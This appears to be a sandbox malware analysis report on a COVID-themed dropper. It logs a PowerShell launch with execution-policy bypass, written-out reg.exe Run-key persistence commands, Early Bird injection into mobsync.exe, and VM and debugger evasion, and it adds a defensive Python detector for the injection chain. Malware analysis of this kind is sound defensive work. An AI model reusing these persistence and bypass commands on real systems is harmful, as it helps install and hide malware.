Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107478 NtWriteVirtualMemory, 18_2_00007FF6FE107478
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67478 NtWriteVirtualMemory, 29_2_00007FF7E3D67478
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67494 NtAllocateVirtualMemory, 29_2_00007FF7E3D67494
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D673EC NtResumeThread, 29_2_00007FF7E3D673EC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D6761C NtQueueApcThread, 29_2_00007FF7E3D6761C
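The four native calls listed for buyonegetone.exe are the complete Early Bird sequence the signatures "Creates a process in suspended mode", "Allocates memory in foreign processes", "Writes to foreign memory regions" and "Queues an APC in another process" describe: the child is started suspended, memory is allocated and written in it, a user APC is queued on its primary thread, and the thread is resumed so the APC runs before the child's own entry point. Each call is common on its own; the detection is the ordered chain from one caller against one suspended child. The Python below is an added example for this page, not code from the report or the sample: it runs that chain logic over a constructed API trace in the shape a sandbox or API-monitor emits (caller pid, API name, the pid a handle resolves to, creation flags), with pids and the benign launcher invented for illustration.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

CREATE_SUSPENDED = 0x00000004   # dwCreationFlags bit for CreateProcess*


@dataclass
class ApiCall:
    """One row of a constructed API trace: who called what, against which process."""
    pid: int          # calling process
    api: str
    target: int       # process the handle argument resolves to (== pid for self-calls)
    flags: int = 0    # dwCreationFlags for CreateProcess*, unused otherwise


# The staged order the report's signatures describe; all four must hit the same suspended child.
EARLY_BIRD = ("NtAllocateVirtualMemory", "NtWriteVirtualMemory",
              "NtQueueApcThread", "NtResumeThread")


def find_early_bird(trace: List[ApiCall]) -> List[Dict[str, int]]:
    """Return one {injector, victim} record per completed Early Bird chain in the trace."""
    pending: Dict[Tuple[int, int], int] = {}   # (injector, child) -> index of next expected call
    hits = []
    for ev in trace:
        if ev.api.startswith("CreateProcess") and ev.flags & CREATE_SUSPENDED:
            pending[(ev.pid, ev.target)] = 0
            continue
        key = (ev.pid, ev.target)
        if key not in pending:
            continue                          # not aimed at a child this caller started suspended
        if ev.api == EARLY_BIRD[pending[key]]:
            pending[key] += 1
            if pending[key] == len(EARLY_BIRD):
                hits.append({"injector": ev.pid, "victim": ev.target})
                del pending[key]
        elif ev.api == "NtResumeThread":
            del pending[key]                  # resumed before anything was staged: plain suspended start
        # Any other call (a repeated write, a query) neither advances nor resets the chain.
    return hits


INJECTOR, CHILD = 2300, 2400   # constructed pids, not taken from the report
MALICIOUS_TRACE = [
    ApiCall(INJECTOR, "CreateProcessW", CHILD, CREATE_SUSPENDED),
    ApiCall(INJECTOR, "NtAllocateVirtualMemory", CHILD),
    ApiCall(INJECTOR, "NtWriteVirtualMemory", CHILD),
    ApiCall(INJECTOR, "NtWriteVirtualMemory", CHILD),   # payload written in several chunks
    ApiCall(INJECTOR, "NtQueueApcThread", CHILD),
    ApiCall(INJECTOR, "NtResumeThread", CHILD),
]
# Constructed launcher: starts a child suspended, touches only its own memory, resumes the child.
BENIGN_TRACE = [
    ApiCall(4100, "CreateProcessW", 4200, CREATE_SUSPENDED),
    ApiCall(4100, "NtAllocateVirtualMemory", 4100),
    ApiCall(4100, "NtResumeThread", 4200),
]

if __name__ == "__main__":
    print("malicious:", find_early_bird(MALICIOUS_TRACE))
    print("benign:   ", find_early_bird(BENIGN_TRACE))
```

The chain is deliberately narrow: a suspended child that is written to and resumed without NtQueueApcThread (the classic CreateRemoteThread or thread-context variants) does not match, so pair this rule with separate foreign-write and foreign-thread rules rather than treating it as a general injection detector.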
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEB110AB 1_2_00007FFAEEB110AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEB10FC2 1_2_00007FFAEEB10FC2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEBE28D1 1_2_00007FFAEEBE28D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEBE6DE8 1_2_00007FFAEEBE6DE8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605CFAC 13_2_00007FF68605CFAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686057019 13_2_00007FF686057019
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605110C 13_2_00007FF68605110C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686052934 13_2_00007FF686052934
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860665A8 13_2_00007FF6860665A8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860415B0 13_2_00007FF6860415B0
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860655F4 13_2_00007FF6860655F4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605FE08 13_2_00007FF68605FE08
One or more processes crash
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
PE / OLE file has an invalid certificate
Source: covid.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: covid.exe Binary or memory string: OriginalFilename vs covid.exe
Source: covid.exe, 00000000.00000002.302616410.0000000000C72000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmp Binary or memory string: originalfilename vs covid.exe
Source: covid.exe, 00000000.00000002.304388463.0000000003200000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs covid.exe
Source: covid.exe, 00000000.00000002.304256413.00000000031A0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs covid.exe
Source: covid.exe, 00000000.00000002.303581212.000000000156A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs covid.exe
Source: covid.exe Binary or memory string: OriginalFilenamedocview.exe4 vs covid.exe
Uses 32bit PE files
Source: covid.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Yara signature match
Source: 00000001.00000002.263748578.000001A410EF0000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: classification engine Classification label: mal100.bank.troj.evad.winEXE@32/132@14/13
Source: C:\Users\user\Desktop\covid.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:244:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6224
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5504
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1
Source: covid.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\covid.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\Desktop\covid.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\covid.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mobsync.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: covid.exe Virustotal: Detection: 15%
Source: covid.exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\covid.exe 'C:\Users\user\Desktop\covid.exe'
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6888 -s 640
Source: unknown Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6224 -s 636
Source: unknown Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Windows\System32\mobsync.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5504 -s 404
Source: unknown Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe'
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4168 CREDAT:17410 /prefetch:2
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\covid.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: covid.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: covid.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: covid.exe Static file information: File size 5253560 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: covid.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4ff600
Source: covid.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Yara detected Powershell Load Encrypted Assembly
Source: Yara match File source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, type: DROPPED
PE file contains sections with non-standard names
Source: buyonegetone.exe.1.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAEEB176DB push ebx; retf 1_2_00007FFAEEB1771A
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF6860870E8 push rcx; ret 13_2_00007FF6860870E9
Source: C:\Windows\System32\mobsync.exe Code function: 15_2_0000023A00BA01C9 push esp; iretd 15_2_0000023A00BA01F8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE1470E8 push rcx; ret 18_2_00007FF6FE1470E9
Source: C:\Windows\System32\mobsync.exe Code function: 20_2_0000023F814901EC push esp; iretd 20_2_0000023F814901F8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3DA70E8 push rcx; ret 29_2_00007FF7E3DA70E9

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: reg.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\buyonegetone.exe
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PromoJohn
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PromoJohn

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\covid.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\covid.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\covid.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4840
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4012
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\covid.exe TID: 5740 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996 Thread sleep time: -7378697629483816s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605D1B8 FindFirstFileExW, 13_2_00007FF68605D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE11D1B8 FindFirstFileExW, 18_2_00007FF6FE11D1B8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D7D1B8 FindFirstFileExW, 29_2_00007FF7E3D7D1B8
Source: C:\Users\user\Desktop\covid.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: covid.exe, 00000000.00000002.303793186.0000000001605000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}w
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mobsync.exe, 0000000F.00000002.320651387.0000023A00CE8000.00000004.00000020.sdmp, mobsync.exe, 00000014.00000002.340229538.0000023F814B8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000001.00000002.294620272.000001A42B5E0000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.254029548.000001EA21550000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.256173246.000001DC42C70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF686048064
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68605F470 GetProcessHeap, 13_2_00007FF68605F470
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 13_2_00007FF686047CB8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF686048064
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686047694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FF686047694
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF68604FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FF68604FEC8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048210 SetUnhandledExceptionFilter, 13_2_00007FF686048210
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 18_2_00007FF6FE107CB8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE108064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6FE108064
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE107694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF6FE107694
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE10FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6FE10FEC8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 18_2_00007FF6FE108210 SetUnhandledExceptionFilter, 18_2_00007FF6FE108210
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 29_2_00007FF7E3D67CB8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D68210 SetUnhandledExceptionFilter, 29_2_00007FF7E3D68210
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D68064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_00007FF7E3D68064
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D6FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_00007FF7E3D6FEC8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_00007FF7E3D67694
Source: C:\Users\user\Desktop\covid.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Early bird code injection technique detected
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 23A00BA0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 23F81490000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 2212C2E0000 protect: page execute and read and write
